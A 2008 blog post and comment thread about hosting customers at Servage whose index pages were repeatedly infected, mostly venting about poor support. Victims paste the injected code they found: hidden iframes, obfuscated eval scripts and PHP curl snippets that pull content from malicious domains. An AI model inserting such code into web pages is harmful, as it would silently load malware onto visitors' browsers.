Servage hacked: Exploit-Iframe (Trojan) Infection
Hacks, PHP, WordpressI found this infection on all the blogs i host at Servage, i dont know what caused it, i doubt its my fault because the infection was found in all index.php files trough my websites, and all index.php were writable only by the owner. So i think this might be a hack on Servage’s servers but they denied it. They also said no one else reported this which i dont believe its true. The infection code is this :
<code><iframe src=”http://fredkidns.com/check/upd.php?t=562″ border=”0″ height=”0″ width=”0″></iframe></code>
<code><iframe src=”http://bestinlive.cn/i/index.php” border=”0″ height=”0″ width=”0″>
</iframe><script>eval(unescape(“%77%69%6e%64%6f%77%2e%73%
74%61%74%75%73%3d%27%44%6f%6e%65%27%3b%64%6f%63%75
%6d%65%6e%74%2e%77%72%69%74%65%28%27%3c%69%66%72%
61%6d%65%20%6e%61%6d%65%3d%62%30%20%73%72%63%3d%
5c%27%68%74%74%70%3a%2f%2f%66%72%65%64%6b%69%64%
6e%73%2e%63%6f%6d%2f%63%68%65%63%6b%2f%75%70%64%2
e%70%68%70%3f%74%3d%35%36%32%3f%27%2b%4d%61%74%68
%2e%72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%
6f%6d%28%29%2a%31%34%30%39%34%29%2b%27%39%33%64%
63%63%35%66%33%5c%27%20%77%69%64%74%68%d%32%36%3
1%20%68%65%69%67%68%74%3d%35%34%20%73%74%79%6c%6
5%3d%5c%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65
%5c%27%3e%3c%2f%69%66%72%61%6d%65%3e%27%29″)); </script></code>
note: the line is so long that i had to insert line breaks
and it was added at the end of each index.php file from my hosting account. I checked the domain names and fredkidns.com its suspended but the other one operates as an online pharmacy, i sent them an email telling about the problem , but i got no reply so far. I havent been able to decode the script to see what it was actually doing, but im sure it was bad. And i forget to tell you the infection was only discovered by Mcafee antiv, bellow is the picture of the error message.
I hope this deoesent happen again because i will be forced to change hosting , maybe i will chose hostgator i heard they are very ok.
Friday, March 7th, 2008 at 1:56 pm and is filed under Hacks, PHP, Wordpress. You can follow any responses to this entry through the RSS 2.0 feed. You can leave a response, or trackback from your own site.
I have also experienced the exact same thing with pretty much all my websites on Servage.net.
so it must be true, although i asked and they said no about this beeing a general problem or at least a problem that affected other clients. In my opinion someone hacked their server and they are shamed to tell us about it
See my ongoing saga with Servage:
http://www.puppylinux.com/blog/
LOL, I reported a similar hack, right at the same time, with them also denying it was serverwide. I don’t run scripts that could cause this. All is secure on my domains. I tripple checked for that, so yeah, pretty sure they’re lying.
Solution: chmod all the indexes 444, for the time being anyway.. Of course, if you need to change it, make it 644 again.
Many of my indexes are static anyway.
I thought it was just me! I’m with Servage and they are such liars! I’ve had “viagra” hack three times now; the most recent today. Each time I’ve contacted them they suggested that I was only person and gave me the standard reply: “change password, check permissions, upgrade third party scripts”. Something needs to be done about these cowboys, and I don’t mean the hackers!
Yesterday, I had the same issue with Servage. When i asked about the logs, i got this stupid answer:
“Due to the clustered structure of our systems there is no single log file for you to use as your site is served by many servers. ”
Retards…
My Servage sites were also hacked, with malicious code inserted into every login/index/home page. VERY ANNOYING. This happened on March 23! Every site had bad code creating my-page-de.info cookies.
My WordPress install have been injected with viagra links about ten times now.
I have tried everything, from changing codes, file permissions to installing a clean DB and all the files from the most recent WP.
Nothing helps so I’m also positive that the security on their side is the problem.
They don’t keep logs, or they wont let me see through it at least.
Their most useful reply is “it’s very hard to tell you what caused the issue”.
I’m sure it most be hard for them.
My WordPress 2.3.3 was hacked as well. Supposedly there aren’t any known exploits for 2.3.3 but who knows. I also had an Aardvark Topsites Script site hacked and 4 mybb sites. ALL sites are pretty much updated to latest version. Somehow hackers injected malicious code onto about 6 sites. Luckily I really pay attention to my sites (have 150) and noticed the address bar doing a redirect it shouldn’t.
I really do wonder if Servage has a problem with being hacked across accounts.
I went ahead and changed all my passwords just the same.
Well as i wrote in that article regarding the change of hosting company, things are a bit better over at hostgator, i dont have hacking or site loading issues, but some uptime issues do exist. And I’m guesssing there is no shared hosting environment that is gonna solve all of these problems. If you want to leave all problems behind the only solution its a dedicated server, which I’m gonna buy in a few months, if my websites continue to expand.
25/04/2007 all my index en servage was infected i dont know how and i hope that dony happen again
as we can all see, from the date i first wrote about servage being hacked, people are still coming and commenting here about their problems with servage, This can only mean one thing, Servage still has problems and gets hacked probably every day
you just don’t know it yet.
it s the seconde time that all my page have been hacked by a spyware in servage
the second time ( 02/05/2008) with that
if (extension_loaded(“curl”)) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, “http://100500.muchcool.info/inc.php?1767″);
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode(“”,file(“http://100500.muchcool.info/inc.php?1767″)); }
if($r) print $r;
Had the same thing happen to my site recently. In fact, the malicious code replaced my entire home page, which didn’t load at all. I wiped all of the index pages and re-uploaded my local copies, only to have the same thing happen two days later.
Not sure what the server company is, as the webspace is through a friend…but judging from what people have said above, my guess is that it’s Servage.
Someone mentioned doing a chmod on all of the indexes to 444…how is this done, and what does it mean?
I’m desperate for a solution. Cheers.
doing a chmod wont solve your problem because of its nature, its just their server getting hacked, so the malicious code is inserted locally, there’s nothing you can do except change the hosting company
If however you wish to chmod your files this is done trough a FTP application like Filezilla for example which is free, you connect with your FTP username and password, next you right click on the folder you wish to Chmod and select file permissions, now if you wish this to be done Recursive(this means all the subfolders and the files inside will also be chmoded to that value)you should check that box too.
Hope this helps.
Thanks for the prompt response Proxy. I’ll have to check in with my friend who owns the webspace and see if we can switch servers.
Best,
- ET
Hmm…as it turns out, my site isn’t on Servage. It’s on Dreamhost. Why the same problem, then? Could this by a spyware/virus issue on my machine?
i doubt that, but if this is not servage there is a possibility that file permissions allowed an attacker to exploit remotely some vulnerability.
Updated permissions to 444 as recommended, but site does not load…understandably. Reverted to previous permissions (755). Any other recommendations?
…actually, scratch that. Updated permissions to 444 and site functions fine.
it should be ok from now on, but you will have some problems with pages that require write permission.
ALL my index.php over several accounts on Servage were hacked with the code mentioned earlier. I had all my index.php set to 444 because this has happened before to me on Servage. However, the hack changes the permissions to 644 BEFORE injecting the code so changing the permissions won’t do any good at all I’m afraid. The blame lies with Servage who basically lie to me every time I have a technical issue trying to pass the buck to me. Their sql servers are painfully slow and their technical support is pitiful. I wish I’d never heard of them and will be getting out as soon as I can. Waste of space.
i did not know the hack changes the permission prior to injection, but thats possible because its run locally on the machines. It’s true, Servage its a waste of time and money.
Just a reminder to folks that I experienced this same issue through Dreamhost…it’s not just native to Servage.
n the last Days I had exact the same problems and delete the code
allways manual from the Index Sites because there is not a real Help
from Servage.
I hold some Accounts by Servage and on all was the same problem.
On one Account I have now a massive Attack which generate near
200 GB Traffic in 2 Hours. The Problem have start yesterday and I
connect Servage via Ticket but all what they is to Suspend my Account
and give Standard answers without help.
In the Morning my Account go back Online and within 2 Hours I have the
same traffic. I wrote again to Servage and ask them about help but now
they did not longer answer me on any Support Ticket. The only what they
do is to suspend my Account again.
So if you Host by Servage and you have a Problem you will find no help.
They push all Problems to you and make nothing.
See below the Support Ticket with open end. I know that I wrote there
some mistakes about that I was angry. So dont look about this.
If I will get anymore answer from them I will post to but I think they
have no Interest to Help.
Here is the Ticket:
May 26 – 06:53 GMT
Customer
Hello,
you have suspend our Account about Bandwith Limit exceeded.
Why you did not inform us if there is any Problem ?
We did not receive any E-Mail or Warning from you.
Also we check the stats and we see that there was not
real some uniques and hits today. See below.
So please can you declare us whats happend.
Stats:
Today 561 3468 10853 215.51 GB
—————————————————————-
May 26 – 06:55 GMT
Servage
Hello xxxxx
Thank you for submitting the ticket.
All Servage accounts are allowed to use 167 GB of transfer per day. If you site goes over this limit it will be taken offline until the next day.
The 167 GB transfer limit per day which means that your traffic allowance will vary a bit from month to month. E.g. you will be allowed to use 5177 GB transfer in a 31 day month but only 4676 GB in a month of 28 days.
Thank you for your understanding,
Kind regards,
xxxx, Support
Servage Hosting
—————————————————————-
May 26 – 06:57 GMT
Customer
Thank you for your standard answer but you did not give us any answer about our Question.
Is this the Kind of Service which Servage have ?
So please answer us about our Questions.
Why you did not inform us ?
How we can have this traffic if there are not
real some Visitors on the site ?
Is there any attack to our Account ?
—————————————————————-
May 26 – 07:38 GMT
Servage
Hello xxxx
Thank you for updating the ticket.
Can you please let us know where you wish to redirect your domain so that we can assist you in better manner.
We are sorry to inform that we do not give any notification regarding the4 bandwidth limit exceeded.
We can recommend to enable hotlinking protection.
You are able to prevent hot-linking from your web sites via the control panel. Please enable the “Hotlink Protection:” via this link:
https://xxxx.xxxx.net
Here is definition of how we count hits:
Each time a Web server sends a file to a browser, it is recorded in the server log file as a “hit”. Hits are generated for every element of a requested page (including graphics, text and interactive terms). If a page containing two graphics is viewed by a user, three hits will be recorded – one for the page itself and one for each graphic. Only one page view will be recorded.
I hope this helps )
Kind regards,
xxxx, Support
Servage Hosting
—————————————————————-
May 26 – 07:57 GMT
Customer
We are not sure at the Moment if we like to redirect for the suspending time the Domain. We will clear it.
You wrote about hotlinking but the subdomain where there traffic come from is a via htaccess closed Member Area. There is no hotlinking possible. We have Ground to think that someone attack the Server.
We have see that yesterday a html Site was hacked. We have delete
this file and install it new.
In the last days the Traffic go high but without real uniques and hits. So for us it look that there work a Hacking script or some similar but we have without your help no one chance to do something about this and to protect the Site.
Also for secure we have change yesterday all Passwords.
Please check with your Admin your Logs if there is a special Traffic from one IP or a DDos Attack.
We have block over Htaccess the most critical IP´s but we dont now
from which Point come this undefined Traffic
—————————————————————-
May 26 – 09:28 GMT
Servage
Hello xxxx
You can take necessary actions for it. The subdomain indeed has taken a lot of bandwidth today.
Kind regards,
xxxx, Support
Servage Hosting
—————————————————————-
May 26 – 13:04 GMT
Customer
Without Help from your site I have no chance to do anything.
Only you can check the Logs if there is a real attack and
find out from which Site it come. I did not have any posibilitiy
to find it out. All what I can do to take care of bad attacks
I have do. This is to see in the htaccess of the Subdomain.
Normal you must have byself a Interest to find out if there
is any Attack and also it must be a big Interest from you
to stand on the side of Client and to help where ever you can.
But as It look in your Answer you dont like to do exact this.
So if you are doing nothing from your Side to solve the Problem
then tell us which Chance we have.
Thats not a great Cooperation.
—————————————————————-
May 27 – 00:06 GMT
Customer
When the Account will be open again ?
—————————————————————-
May 27 – 01:12 GMT
Customer
The Account is allways down. It will be great if you tell me when he will be online again.
—————————————————————-
May 27 – 02:21 GMT
Servage
Hello xxxx
When a account is suspended for exceeding the bandwidth usage limits, it will be unsuspended the next day at 1.00 GMT.
Kind regards,
xxxx, Support
Servage Hosting
—————————————————————-
May 27 – 03:41 GMT
Customer
We are again under attack. When you like to help us ? We have closed the Site http://xxxxx.org because there is the Attack
—————————————————————- Here they Suspend the Account without any Answer until now
May 27 – 03:48 GMT
Customer
Transfer: Domain:
0.01 GB xxxx.org
0.01 GB xxxx.org
190.19 GB xxxx.org
0.83 GB xxxx.org
—————————————————————-
May 27 – 03:51 GMT
Customer
We have rename the root folder of this subdomain so that there will be show no only the message “file not found”
—————————————————————-
May 27 – 04:38 GMT
Customer
This what you do is impossible. 2 Days we try now to get help from you about a Hacker attack (ddos) but all what you do is to suspend our Account. We have no access to the Logfiles to block this Attack
This can be come only from your Site but you did not do anything.
I have again had a VERY long exchange between myself and Servage regarding Microsoft Exchange and pop3. Basically, after a week of going backwards and forwards they are unprepared to assist either because they can’t due to incompetent staff or they won’t due to incompetent in-house policies. I have decided to move away from this abysmal company at the earliest possible opportunity. Does anyone have any opinions regarding HostGator?
I know this topic has developed away from the original post but it is related to Servage and their AWFUL service so I thought it would be ok to post here. If not… sorry and could a mod move it to a more appropriate place and let me know where. Thanks.
Alan Myers the best thing you can do is to leave them, i am with Servage for almost 3 months and I’m happy with their services. They are not perfect, they have some downtimes, but they are short,rare and unpredictable. For example i had a downtime today for about 1 hour, but its been like 2 months since i last had a similar downtime. It appears that the server where I’m hosted got attacked and they had to close down the interface to limit the damage. Apart from this i had no other problem with them. In fact you might not see this kind of issues ever, it depends on your luck and the server where you’ll get hosted. Bottom line, I’m stickin with Hostgator for the moment.
I am also having problems with servage, I have had all the above problems also I found changing permissions to 444 does nothing, some of my sites do not even have any scripts running at all, I have been getting this added to my index.html pages every couple of days, I am so sick of this company
[...] 7. marts 2008: Servage hacked: Exploit-Iframe (Trojan) Infection [...]
Servage — what a bunch of crooks and thieves. these sorry lazy apathetic incompetent f****! servage does not give a shit about their customers.
whatever started going to hell and downhill began at the beginning of the 2008 year for me. Is that when they sold it ? I don’t know but today is at least the 6th time my sites have been hacked
and it is the final time because I am moving all my sites and i hope they go down in flames those sorry f*****g assholes. THEY are pure crapola.
warning AVOID SERVAGE!
DO NOT USE SERVAGE.NET unless you want to be hacked every month and treated like shit.
When it first happened i thought it only happened to me but it seems that everybody suffered from their lack of efficiency.
Today I found next addition code on my page
It’s generate a lot of links on my index
My index file permission – 444. How it can be that sombody change my file?
Sorry I do not see the code I wrote. I wrote additional code on me index page again
if (extension_loaded(“curl”)) {
$ch = curl_init();
curl_setopt($ch, CURLOPT_TIMEOUT, 30);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
curl_setopt($ch, CURLOPT_URL, “http://google-analitycs.net/AdWords/urchin_prz0.dat”);
$r = curl_exec($ch);
curl_close($ch);
} else { $r=implode(“”,file(“http://google-analitycs.net/AdWords/urchin_prz0.dat”)); }
if($r) print $r;
these things get inserted locally into every index file
. It’s plain simple, Servage get’s hacked, and than your website has to suffer.
My sites were hacked again today too, they inserted a functions.js which contained this
eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!”.replace(/^/,String)){while(c–){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return’\\w+’};c=1};while(c–){if(k[c]){p=p.replace(new RegExp(‘\\b’+e(c)+’\\b’,'g’),k[c])}}return p}(‘d.f(“”);’,16,16,’|iframe|in|cgi|cn||orentraff|src|http|width|display|none|style|document|height|write’.split(‘|’),0,{}))
then a script in my pages with this in it
also another page had
eval(unescape(“%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%27%5C%75%30%30%33%63%5C%75%30%30%36%39%5C%75%30%30%36%36%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%64%5C%75%30%30%36%35%5C%75%30%30%32%30%5C%75%30%30%37%33%5C%75%30%30%37%32%5C%75%30%30%36%33%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%36%38%5C%75%30%30%37%34%5C%75%30%30%37%34%5C%75%30%30%37%30%5C%75%30%30%33%61%5C%75%30%30%32%66%5C%75%30%30%32%66%5C%75%30%30%36%66%5C%75%30%30%37%32%5C%75%30%30%36%35%5C%75%30%30%36%65%5C%75%30%30%37%34%5C%75%30%30%37%32%5C%75%30%30%36%31%5C%75%30%30%36%36%5C%75%30%30%36%36%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%65%5C%75%30%30%32%66%5C%75%30%30%36%39%5C%75%30%30%36%65%5C%75%30%30%32%65%5C%75%30%30%36%33%5C%75%30%30%36%37%5C%75%30%30%36%39%5C%75%30%30%33%66%5C%75%30%30%33%35%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%37%37%5C%75%30%30%36%39%5C%75%30%30%36%34%5C%75%30%30%37%34%5C%75%30%30%36%38%5C%75%30%30%33%64%5C%75%30%30%32%32%5C%75%30%30%33%30%5C%75%30%30%32%32%5C%75%30%30%32%30%5C%75%30%30%36%38%5C%75%30%3
I’m so sick of this and servage never admits to anything
I have exact the same Problem and allways again I found this functions.js.
The best is the Reaction from Servage after I ask them about Advice.They answer:
You have to hold your Scripts and Sites clean of any Infection or we must suspend your Account.
Thats real a Joke !
they must think we’re all stupid
I have now moved over 50 websites away from these people. I now only have one website hosted with them which will be moved by the end of the week. I have never experienced service as pathetic as this ever. Everything about it is a joke. I will never go back to these people again and if anyone asks me my opinion I will say AVOID AT ALL COSTS.
Their servers are constantly being hacked which they deny and blame the end user for. Their clusters do not appear to be set up efficiently which means big delays when using the MySQL servers. CONSTANT timeouts from the MySQL servers, HUGE security issues – I would NEVER store card details with them again – and the worst thing about it all the staff. The technical support is a complete waste of time. You may as well spend your time constructively and use it to find a new host rather than to try any kind of interaction with these clowns.
They have NEVER answer the question/ query satisfactorily for me and end their pathetic attempts at technical support with stupid little smileys which serve only to piss people off even more.
I am amazed that someone has not complained officially to Trading Standards or some other regulatory body because the product they sold me was definately not ‘fit for purpose’. I can’t believe they’re still trading and that people are stupid enough to actually choose them as hosts anymore. The only positive reviews these people get appear to be planted by their own employees. The web is full of bad reviews about their service.
Me, I’ve voted with my feet and invested in an account with a reputable webhost. Servage can take their ‘award winning service’ and 96% customer satisfaction survey and shove it where the sun doesn’t shine.
Strong opinions about these people… Me? No I’m just reacting to the abysmal service these people provided me with. I COMPLETELY wasted my money with them.
Alan, I accept your comment complete.
Ißm very tired from this Company too but is it possible
that you tell us which alternative you use now ?
I now use Hostgator with no problems whatsoever. I use the baby croc option. Tech support has been superb up to now.
I’m using Hostgator too, with no problems. I recommend it
my question is where do you go if you have adult or gambling content and affiliate sites that are legal in europe or other countries but subject to prosecution in the usa?
you can’t use hostgator or us hosting for those sites. so where else other than servage? esp. since they hate and lie to their customers and their sites are hacked every other day.
thanks
so far i have no experience with other EU hosting..
I asked HostGator re: adult sites. They relplied that this is fine as long as the content is not illegal and there are warnings stating that it is adult orientated.
I also host a ‘lottery’ style site with them and this is fine too as long as the people playing agree to the t&c etc and declare they are of legal age in the country they are playing from.
I would ask HostGator the questions directly as I think you may find they are OK with adult and gambling sites as long as no law is being broken.
I have also some some adult and non adult Sites.
To test I have join now nakedhosting for my Adult Sites.
I will move one Site to them and test them Hosting.
Did anybody have work with them before ?
Frank, can you show me one of your adult websites ? maybe the most profitable..
And Alan, same question to you, can you show me your lottery style website ? post the link here if yes.
The website is in beta form at the moment and the client is busy testing the functionality so I cannot post it yet. We are looking at an end of August launch date.
ProXy connect me over Skype agc.ltd
Alan, okay
Frank i don’t use skype, only yahoo messenger so if you have an yahoo id or MSN we can connect.
SERVAGE.NET down/hacked for a third day today ! Try log in to CP Panel or sign-up, or anything ! Worst Security I have ever seen. Star away from SERVAGE.
I’m using Servage since 3 years.
At the beginning it was unreal, wonderful, fast, huge hosting.
With time things changed.
MySQL errors, email not sent or not received, but above all CONSTANT ATTACK BY HACKERS.
I showed them everything I found about those hackers (how they get information about root paths, what kind of holes on Servage servers they talk about on hackers forums…), but still they accuse my scripts to be unsafe.
I don’t understand what a policy they are using, as soon as it will be spread on the internet that Servage is unsafe hosting they will have no more customers, so why they are not investing time andresources to increase security?
I’m out of words, I will soon move to another host, though I’ve paid renewal just a few weeks ago.
Even though you just paid renewal you should ask for a refund.
My sites were hacked again today on servage, I’m sick of this shit, I’ve even got the permissions set 444 so how can they write to them?
I’m guessing the writing is done locally so the permissions are useless.
if anyone knows of a non-USA hosting service they recommend now that servage has proven they hate despise and LIE LIKE DOGS to their own customers every minute of every day — can you please post where you are finding hosting to replace the shittiest of shitty hosting (servage.net) – -which went to complete dog crap when they were bought by a USA company based in TX as far as I can tell, I might add.
about hostgator: they might be fine but they have not control over whether some moralistic prosecutor in some podunk town (like in florida) decides to FILE CRIMINAL CHARGES if they don’t like what’s on your site whether it’s legal or not based purely on their puritanical ‘local obscenity standards’ – or if you have gambling sites too – it has and is happening in the US. I won’t use hostgator for those sites even tho they are legal sites — can’t afford to take the chance.
my website with a traffic of 10000 has been infected google has blocked my website http://www.neeshu.com it is hosted on servage. I dont know what to do now I have put the site offline
the thing with the virus happened to me too, and I’m sure it also happened to many other but not everybody notices it. I was alerted by a reader of my website, who saw an alert on his av software.
The same was by me. What did you think how Servage has help me ?
You dont know ?
They suspend my Account with the comment that I have not take anything about secure and it is a high risk for other User. For this I have no one words. The only possitive is that I have Join another Hoster for some time and I have tranfer all my files before.There was only a smal part on Servage which I setup now by the new Hoster. I have stay many Years by Servage and in the beginning they have a great Support but whats going on now is not longer acceptable.
i couldn’t agree more, the facts speak for themselves.
Maybe we should start a class action lawsuit and sue these pricks for loss of earnings, after the last attack my sites have now been marked in google as This site may harm your computer. and I have lost all my #1 spots in google
I just emailed this to servage, I will post the response when I get one
Can you please pass this link along to someone high up in your company? http://www.google.com.au/search?hl=en&q=servage+hacked&start=0&sa=N
My sites are being hacked weekly now even static html pages with the permissions set to 444, maybe if somebody high up in management might stop blamming everyone else and update your security I would consider staying with your company, I am looking for a new host at the moment, that will actually look after there customers and patch there security so they are not hacked weekly.
Please dont email me saying to change my passwords and update my scripts, your servers are being hacked not our accounts fix it and read the complaints in google
this is really sad
but the biggest problem is that seems no one is able to find a good alternative host
it’s almost 2 weeks that my website is safe, but mysql downtimes are becoming more and more annoying
Rebel, i can’t wait to see their answer, don’t forget to post it here.
wonderer: hostgator is relatively good hosting, it only depends on what are your needs.
i’ve heard good and bad about hostgator, but the real problem is that it’s not european host
Hey ProXy, this the response I got from servage,Which I never reponded too, I ended up signing up with hostgator and asked google to remove the warning page for my listings which they did, I have a heap of #1 spots in google and no one could get to my sites, I was so pissed
Hello Rebel,
We are very sorry for the inconvience. May I ask if the problems only exist on a certain virtual host? Since when do you have this problem?
We do our best to improve the security of our system and actually we’re planning to implement a new selfmade cluster software, which will improve the security a lot!
Kind Regards
Manuel, Support
Servage Hosting
P.S Servage can kiss my Aussie arse!!!
I’ve left them even though my account does not run out until the end of January. I too am with HostGator. Not perfect by any means but INFINITELY better than those clowns at Servage. I have left one file on there – a blank index.php – too see if it gets infected. Although this is only 10bytes in size Servage say I am using 3.5GB of space. I have nothing in there anymore. No databases, e-mail accounts, cron jobs. Just 1 little index.php file. Servages response when I asked why bandswidth useage was rising and 3.5gb disk space showing as used….
“Hello Alan,
We can offer to move your account to our newest cluster if you would like that for solving the issue. If yes, kindly advice us by updating this ticket.
Please note your web site may be inaccessible up to 24 hours after the move. Please confirm that you want your account moved. We are looking forward hearing from you
)
Kind Regards
Steven, Support
Servage Hosting
”
They deserve to be hacked and go out of business. They are selling product not fit for purpose. At least that’s what they did to me and every time I asked for things to be put right I got the same blockhead answers and nothing ever got done. So, I’ve moved now and good riddance to Servage.
@Rebel, their response is lame as usual, it drives you crazy when you see those reply’s
@Alan, same problem, lame reply’s that don’t offer valid solutions to our problems. The gig with “moving you to another cluster” is so old… and the change wont do anything good.
Today I found addons on my index pages.
I had all my index.php set to 444 because this has happened before to me on Servage.
Data of changes 10.10.2008
Please check all your index files
_script src=”http://www.google-analitic.com/urchin.js” type=”text/javascript”></script_
Wow!
I’m surprised at how many people have issues with Servage.net.
I’m with Servage and I’m now thinking of moving all my sites.
In the past 2 weeks, 2 sites have been compromised with the google-analitic.com malware. One php dating site and another with static html pages.
They denied responsibility and just suggested I change my permissions and reinstall all my software. Fantastic…NOT!
Since beginning 2008, I have noticed a decline in their customer service.
Time for a host change.
Im just writing privatly what the company i work for are in current situation.
We recived a mail 2 days ago saying one of our mail accounts had been spammed with 16000 mails during one day.
We checked the account in question and realize that we only recivied ~ 50 mails per day and yes totaly we have around 16.000 mails in our mailbox but not what we have recived during one day. Since it’s a support mail address we allow all kind of mail and removes bad mails manualy just so we know we can recive bad written mails that are marked as spam.
Some minutes later we was infomed they they would close our mail account for 12h, a temporary ban.
With this the problem was solved from our side, but still we could not figure out why we could not see any of thoose ‘spam’ mails they said but then we was disconnected and realize that all our mail accounts we had with our account was closed!
I kindly ask them to open up our mail accounts since we did fix the problem they said we had, a open form for our support, and instead of sending mail directly to our mailbox with smtp auth we redirected the mail to an local mail box to solve the issue.
I then waiting the night and was pissed off to be onest to read the answer. They still refused to open our mail accounts since they wanted us to setup a catcha box and if that is good, our mail was sent to ‘localhost’ and not sent to Servage.
Another mail was sent with replys of the first mail and kindly asked what part they dont understand and if i should write in their native language instead so there would not be any more miss communication.
Now, im working from GMT+7 so 1am i got 2 mails from their support and i was quick to answer them (within 5 minutes) to meaby solve the issue realizing that 4am, 3 hours later, that the support team should forward this to the technical support team to investigate if our mail addresses could be opend or not and that i had to wait until tomorrow since there was no technical people there.
At this point writing this our mail accounts have been suspended for exact 36 hours and i still wait for their tecnical pesonal to ‘investigate’ our contact form, even if we have told them to try it and see that we dont send mail to them (that was yesterday) and still they fight over this.
We basicly only host our mail and why we selected them was that i was to tired
to setup another qmail machine so we took the short way and hosted our mail instead – a bad decision.
Not to talk about all our standard html files that gets infected all the time even if we are only using them as mailhost.
Best answer from Servage from one of their tech people
when i asked him to try the mail service since i wanted to make him try it (he said our services are working) but still the mail was down,
was that our services was working and our websites aswell, well the problem is that our webhosting works perfectly becaus we are not hosting them with Servage ;p
The tech guy dident even check anything and just answerd that everything was ok. After several mails telling them to try it before taking action they still take action, send out mail and tells the customer what to do, even if that help.
Regarding virus, is there not anything possible to do for companies that ignore virus and can be suspended for it (for spreading virus without doing anything against is)
I wish someone could make pressure on that company so they understand they cant ignore customers, play their game with other lives (and money income vise) and be responsible for stupidity to be onest.
You dont see the problem until you get one, and then you know if it was a good host or not.
To above post, i have support for all the info i have said and the mails from Servage can be sent to this site owner for proof, of stupidity from Servage’s Support team and to backup my story.
My site got hacked in april or may or something, and the bad thing is that Google still marks my site as ‘potentially unsafe’, although it’s clean for several months now.
But I dropped in google’s results on some interesting keywords and therefore hardly get any visitors anymore.
There goes my few hundred euros a month pocketmoney
Harry, have you asked google for a Request reconsideration? If you have a google webmaster tools account? (which is free)
If so just click on the Request reconsideration and tell them you were hacked and the site is now clean, it happened to me and it only took a couple of hours and I was back at #1 I hope that helps
Along with the issues everyone has experienced with slow sites, high down time and that hacking/security issue, poor support and lies I’m thrilled to announce that I’m now locked out of my account, unable to use support (as you need to be logged in)and all email requests for help come back asking me to sign into support and post a ticket!
That’s bad, try contacting them on their contact email, or by phone
Leave this Company asap because it will be not better there.
In the past I have 8 Account there to manage.Two from me and
six from Clients and I´m happy that I have moved six ccount to
other Hoster.The last two will follow.
By one of them they have disable now the php Include function.
They told me that this is a security reason and they have do it
by all Accounts. That this is a lie I must really not say.
By my other Account it work without any Delay.Near all my scripts
on this Account doenst work longer and they are not willed to change it.
That this is a lie I must really not say. By my other Account it work
without any Delay.
If you host by Servage a Adult Page then I have a good and secure
Alternative. Ask me over ICQ 265917221
Hi
I have been with SERVAGE for a number of years but noticed a huge decline in their service over the past few months. I have been trying to set up a new email account, 24 hours later the issue has not been resolved!
I could not access the web space via FTP (2 day ago), they blamed everyone except themselves. I spent 1.5 hours with NETGEAR, (a superb company for customer service btw), spoke to my ISP, and 10 hours of head scratching and messing with all kinds of ‘configs’ and gave up. The next day everything worked, mysteriously, and I contacted Servage CS and pointed out the fact that when something doesn’t work they deny any knowledge of it, then mysteriously things are up and running again, I got some banal reply from them.
I Googled the issues hence I found this rather long list of other people who have experienced similar problems to myself. One commentator :
Posted by Bobby Becauseon Tuesday 26th August, stated:
“Wow!
I’m surprised at how many people have issues with Servage.net.
I’m with Servage and I’m now thinking of moving all my sites.”
I felt the same when I came across this site.
Not being able to set up an email account is the proverbial straw that broke the camels back for me, it’s ridiculous that a web hosting company could have such problems, and not resolve them quickly.
Like many here, I also need a EU based server, as I don’t want to be brought down by some small minded bible bashing US person/laws etc.
If I find a company worthy of mention I’ll post it here.
Yes like many here, I also feel it’s time to move away from them, and frankly warn others to stay well away from them, what a waste of money and so many headaches and problems, all of which they continually deny with their banal customer service replies.
Lawrence please let us know if you find something worthy
I have had three accounts with servage and had referred several freinds. but its very sad to know that all the servage servers are infected with spywares and they leave a iframe embedded into all your pages. if you browse your sites hosted on servage through google chrome it states that the site has a malware into it. Servage seems to be sleeping over this and is doing nothing. Time to wake up servage. or start loosing customers
” Time to wake up servage. or start loosing customers”
Yeah right. They will NEVER wake up. They sell services to people until those people find out the truth about the quality of service. Those people (like me) then leave. However, there are ALWAYS new people coming to the market who happen amongst servage and buy their services. Servage don’t care about repeat business because they know they can’t hold a customer because of their ‘unfit for purpose’ service they peddle. They earn their money through new referrals who last a year (if that). That seems to be enough for them to survive so why should they invest in a ‘real’ server farm with c’competent’ staff when they can con people into paying them for the rubbish they sell now?
I don’t know Alan.. I’m thinking there’s a catch, maybe we don’t know everything. I mean, there is no reason to run your business that bad.
They must be getting their money from somewhere else.
The staff are BAD. How do they explain that? There are plenty of competent staff out there. Why do they employ idiots who have not got the first clue? Why do they have servers which are so vulnerable when there are so many ways to protect your investment? Why do they hold credit card verification numbers (the ones on the back of the cards) on vulnerable servers? Why do the staff give answers wich illustrate that 1. they haven’t got a clue and 2. don’t read the ticket and 3. can’t speak, read or write english?
Too many questions, too few answers. The service these people provide is pathetic.
Some more new funny Stuff from Servage.
Sorry for my bad English but if
I´m angry I forget all. See the
Ticker below.Without Comments !
2008-11-25 09:45
Customer
We receive the Mail below from you. The Domain where come
the traffic from is longer time not hosted by you.
What we can do to stop this highload ?
You wrote:
Dear xxxxx,
We have noticed that your account is using many server resources
at the moment. The last hours your account has had 353133
requests for your site which is quite allot. We will have to ask
you take measures to lower the load or we may be forced to temporarily
suspend your website.
We hope that we do not need to take such drastic measures but
it may be necessary to ensure good performance for other
customers on the cluster. I’m sure that you understand our
commitment to provide the best possible service to all customers.
If you have any questions please submit a support ticket via the
control panel and our support staff will be happy to answer any
questions you may have.
Best regards,
Your Servage Team, http://www.servage.net
This is an automated email. For questions or concerns kindly
open a support ticket via the control panel: http://cp.servage.net/
—————————————————————————–
2008-11-25 11:31
Servage – Victor
Hello xxxxxx,
Thank you for submitting the ticket.
You can verify from the statistics option which domain is taking the high load
and then you can purchase a new account and transfer that domain into that account.
In this way you can reduce the high load.
Feel free to update us if any problem persists.
Kind Regards
Victor, Support
Servage Hosting
—————————————————————————–
2008-11-26 03:23
Customer
